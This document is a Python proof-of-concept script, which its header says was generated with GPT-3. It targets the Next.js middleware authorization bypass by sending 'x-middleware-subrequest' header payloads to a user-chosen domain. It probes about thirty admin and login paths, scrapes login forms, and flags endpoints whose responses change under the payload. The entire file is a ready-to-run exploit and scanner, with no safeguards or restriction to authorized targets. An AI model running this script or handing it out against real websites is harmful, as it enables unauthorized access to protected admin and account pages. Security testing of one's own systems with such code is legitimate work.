# Proof of Concept (PoC) generated using OpenAI GPT-3 based on publicly available information.
# Script prompted, refined, and verified for functionality; original CVE discovery credit to:
#   - Allam Rachid (zhero;)
#   - Allam Yasser (inzo_)
# Reference and community discussions available at: https://discord.gg/gyKec6X
# www.websec.nl
import requests
import json
import difflib
import re
import sys
from bs4 import BeautifulSoup
from urllib.parse import urlparse


def log(message: str):
    """Prints a log message and flushes stdout immediately."""
    print(message)
    sys.stdout.flush()


def is_login_page(content: str) -> bool:
    """
    Heuristic check to see if response content is likely a login page.
    Looks for common markers such as 'login', 'sign in', 'auth', etc.
    """
    if not content:
        return False
    login_markers = ["login", "sign in", "signin", "sign-in", "auth", "username", "password"]
    content_lower = content.lower()
    return any(marker in content_lower for marker in login_markers)


def responses_differ(baseline: str, test: str, threshold: float = 0.9) -> bool:
    """
    Compares two response bodies using difflib.
    Returns True if the similarity ratio is below the threshold (default 0.9).
    """
    if baseline is None or test is None:
        return False
    ratio = difflib.SequenceMatcher(None, baseline, test).ratio()
    return ratio < threshold


def get_baseline_response(url: str, timeout: int = 5):
    """
    Performs a baseline GET request that follows redirects.
    Returns the final response so that we only test endpoints that exist.
    """
    try:
        log(f"[*] Sending baseline request to: {url}")
        resp = requests.get(url, allow_redirects=True, timeout=timeout)
        return resp
    except requests.exceptions.Timeout:
        return {"error": "Request timed out"}
    except requests.RequestException as e:
        return {"error": str(e)}


def get_test_response(url: str, payload: str, timeout: int = 5):
    """
    Performs a GET request with the x-middleware-subrequest payload.
    Follows redirects to reach the final page.
    """
    headers = {"x-middleware-subrequest": payload}
    try:
        log(f"[*] Testing payload '{payload}' for: {url}")
        resp = requests.get(url, headers=headers, allow_redirects=True, timeout=timeout)
        return resp
    except requests.exceptions.Timeout:
        return {"error": "Request timed out"}
    except requests.RequestException as e:
        return {"error": str(e)}


def extract_login_form_paths(html: str, base_url: str) -> list:
    """
    Parses HTML to extract form action URLs from forms that use POST and contain
    common login keywords. Returns a list of paths (relative) that can be used for testing.
    """
    soup = BeautifulSoup(html, "html.parser")
    login_paths = []
    forms = soup.find_all("form", method=re.compile("^post$", re.I))
    for form in forms:
        action = form.get("action", "")
        if action and is_login_page(action):
            if action.startswith("/"):
                login_paths.append(action)
            else:
                try:
                    parsed = urlparse(action)
                    base_parsed = urlparse(base_url)
                    if parsed.netloc == base_parsed.netloc:
                        login_paths.append(parsed.path)
                except Exception:
                    continue
    return list(set(login_paths))  # remove duplicates


# Prompt user for the target domain
user_input = input("Domain (or full URL): ").strip()
if not user_input:
    raise SystemExit("No domain provided.")

# Ensure the URL has a scheme
if not user_input.startswith("http://") and not user_input.startswith("https://"):
    user_input = "https://" + user_input

# Parse the input URL
parsed = urlparse(user_input)
base_url = f"{parsed.scheme}://{parsed.netloc}"
given_path = parsed.path

# If a full path is provided (not just "/" or empty), then only test that endpoint.
if given_path and given_path != "/":
    test_paths = [given_path]
    log(f"[+] Full path provided. Testing only endpoint: {given_path}")
else:
    # Extended list of common endpoints to test.
    test_paths = [
        "/",
        "/admin",
        "/admin/login",
        "/dashboard",
        "/dashboard/admin",
        "/account",
        "/account/login",
        "/user",
        "/user/login",
        "/users/login",
        "/dashboard/login",
        "/auth/login",
        "/login/auth",
        "/administrator",
        "/administrator/login",
        "/login",
        "/signin",
        "/secure",
        "/private",
        "/management",
        "/manager",
        "/controlpanel",
        "/control-panel",
        "/adminpanel",
        "/member",
        "/members",
        "/portal",
        "/access",
        "/backend",
        "/dashboardin/login"
    ]

# Try connecting to the base URL
log(f"[*] Connecting to base URL: {base_url}")
try:
    r = requests.get(base_url, timeout=5)
except requests.exceptions.Timeout:
    log("[!] Timeout occurred connecting to the domain.")
    if base_url.startswith("https://"):
        base_url = "http://" + base_url[len("https://"):]
        log(f"[*] Retrying with HTTP: {base_url}")
        try:
            r = requests.get(base_url, timeout=5)
        except requests.RequestException as e:
            error_output = {"error": f"Could not connect to {user_input}: {str(e)}"}
            print(json.dumps(error_output, indent=2))
            raise SystemExit(1)
    else:
        error_output = {"error": f"Could not connect to {user_input} due to timeout"}
        print(json.dumps(error_output, indent=2))
        raise SystemExit(1)
except requests.RequestException as e:
    error_output = {"error": f"Could not connect to {user_input}: {str(e)}"}
    print(json.dumps(error_output, indent=2))
    raise SystemExit(1)

# If no full path was provided, try to extract login form endpoints from the base page.
if given_path in ("", "/"):
    try:
        base_resp = requests.get(base_url, allow_redirects=True, timeout=5)
        base_content = base_resp.text or ""
        log(f"[*] Retrieved base page. Final URL: {base_resp.url}, Status code: {base_resp.status_code}")
    except requests.RequestException as e:
        base_content = ""
        log(f"[!] Error retrieving base page: {str(e)}")
    login_form_paths = extract_login_form_paths(base_content, base_url)
    if login_form_paths:
        log(f"[+] Found login form paths: {login_form_paths}")
    else:
        log("[*] No login form paths found on the base page.")
    # Append discovered login form endpoints if not already in our list.
    for path in login_form_paths:
        if path not in test_paths:
            test_paths.append(path)

log(f"[*] Total endpoints to test: {len(test_paths)}")

# Different payloads for various Next.js versions
payloads = [
    "pages/_middleware",
    "middleware",
    "src/middleware",
    "middleware:middleware:middleware:middleware:middleware",
    "src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"
]

results = []

for path in test_paths:
    url = base_url.rstrip("/") + path
    log(f"\n[>] Testing endpoint: {url}")
    baseline_resp = get_baseline_response(url)

    if isinstance(baseline_resp, dict) and "error" in baseline_resp:
        log(f"[!] Baseline request for {url} failed: {baseline_resp['error']}")
        results.append({
            "path": path,
            "error": f"Baseline request failed: {baseline_resp['error']}"
        })
        continue

    final_url = baseline_resp.url
    baseline_status = baseline_resp.status_code
    baseline_content = baseline_resp.text or ""

    # Skip if the final page does not exist (e.g. returns 404)
    if baseline_status == 404:
        log(f"[*] Skipping {final_url} as it returned 404.")
        continue

    # Determine if the endpoint appears to be a protected login page.
    unauthorized = False
    if baseline_status in (401, 403):
        unauthorized = True
    elif baseline_status in (301, 302, 303):
        unauthorized = True
    elif baseline_status == 200 and is_login_page(baseline_content):
        unauthorized = True

    if not unauthorized:
        log(f"[*] Skipping {final_url} as it does not appear to be a protected login page.")
        continue

    for payload in payloads:
        test_resp = get_test_response(url, payload)
        if isinstance(test_resp, dict) and "error" in test_resp:
            log(f"[!] Payload request failed for {url} with payload '{payload}': {test_resp['error']}")
            results.append({
                "path": path,
                "payload": payload,
                "error": f"Payload request failed: {test_resp['error']}"
            })
            continue

        test_status = test_resp.status_code
        test_content = test_resp.text or ""

        status_changed = (baseline_status != test_status)
        content_changed = responses_differ(baseline_content, test_content, threshold=0.9)
        vulnerable = status_changed or content_changed

        log(f"[+] For {final_url} with payload '{payload}': baseline_status={baseline_status}, test_status={test_status}, vulnerable={vulnerable}")

        results.append({
            "path": path,
            "payload": payload,
            "baseline_status": baseline_status,
            "test_status": test_status,
            "baseline_url": final_url,
            "content_different": content_changed,
            "vulnerable": vulnerable
        })

print("\nFinal Results:")
print(json.dumps(results, indent=2))
